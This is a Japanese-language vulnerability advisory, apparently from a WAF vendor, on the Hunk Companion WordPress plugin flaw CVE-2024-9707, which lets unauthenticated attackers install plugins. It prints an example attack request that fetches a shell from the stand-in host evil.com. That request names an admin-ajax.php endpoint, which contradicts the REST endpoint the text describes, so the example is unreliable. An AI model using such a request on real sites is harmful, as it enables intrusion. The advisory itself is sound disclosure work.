[2025.03 脆弱性レポート] HUNK COMPANION プラグインのリモートコード実行 (CVE-2024-9707)
Hunk Companion プラグインのこの重大な脆弱性は、より広範な悪用チェーンの最初のステップとなる可能性があります。既知の脆弱性を持つ別のプラグインがこの脆弱性を介して有効化された場合、攻撃者はWordPressサイト上でリモートコード実行を達成する可能性がある。
WordPressが広く配布されていること、ThemeHunkテーマの人気が高いこと、そしてこの欠陥の重大な性質から、これは深刻なセキュリティリスクとなります。
結論として、この脆弱性は、適切なセキュリティ・レビューを実施し、ソフトウェア・コンポーネント内に強力な認証と認可チェックを実装することの重要性を浮き彫りにしている。広範囲に影響を及ぼし、悪用が容易であることから、これは早急な注意と対策が必要な深刻な脅威である。
当社のAIWAF製品は、様々なプラグインの脆弱性に対処するパターンを開発しており、今後も発見された関連脆弱性に迅速に対応していく。
1. 概要
WordPress 用プラグイン Hunk Companion はウェブサイトを作成するために必要な機能を含むプラグインですが、このプラグインで見つかった RCE 脆弱性 CVE-2024-9707 について分析しました。
ソース : https://www.bleepingcomputer.com/news/security/hunk-companion-wordpress-plugin-exploited-to-install-vulnerable-plugins/
2. 攻撃タイプ
CVE-2024-9707 は、1.8.4 を含むすべてのバージョンの WordPress 用 Hunk Companion プラグインに、/wp-json/hc/v1/themehunk-import REST API エンドポイントの機能チェックが欠落していることによる脆弱性で、プラグインの不正なインストール/有効化が可能です。これにより、認証されていない攻撃者が任意のプラグインをインストールし、有効化できる可能性があり、他の脆弱なプラグインがインストールされ、有効化されると、リモートでコードが実行される可能性があります。
攻撃方法:
- 攻撃者は細工したHTTPリクエストを/wp-json/hc/v1/themehunk-importエンドポイントに送信する。
- 機能チェックが欠けているため、リクエストはユーザー認証またはパーミッションの検証を行わずに処理される。
- リクエストで指定されたプラグインが対象のWordPressインスタンスにインストールされ、有効化されます。
攻撃構文の例:
POST /wp-admin/admin-ajax.php?action=hunk_companion_import HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: ...
content={"file_url":"http://evil.com/shell.php"}
3. 対応
CVE-2024-9707 は、1.8.5 以降の Hunk Companion Plugin 用のパッチで対処された。
脆弱性は /wp-json/hc/v1/themehunk-import エンドポイントへの細工された HTTP リクエストを介して攻撃されるようです。
AIWAF製品でさらに分析し、パターンとして対応する予定です。
4. 結論
Hunk Companion プラグインのこの重大な脆弱性は、より広範な悪用チェーンの最初のステップとなる可能性があります。既知の脆弱性を持つ他のプラグインがこの欠陥を通じて有効化された場合、攻撃者はWordPressサイト上でリモートコード実行を達成する可能性がある。
WordPressが広く配布されていること、ThemeHunkテーマの人気が高いこと、そしてこの欠陥の重大な性質が相まって、これは深刻なセキュリティリスクとなっている。
結論として、この脆弱性は、適切なセキュリティ・レビューを実施し、ソフトウェア・コンポーネント内に強力な認証と認可チェックを実装することの重要性を強調している。広範囲に影響を及ぼし、悪用が容易であることから、これは早急な注意と対策が必要な深刻な脅威である。
当社のAIWAF製品は、パターンを開発することで様々なプラグインの脆弱性に対応しており、今後も発見され次第、関連する脆弱性に対応していく。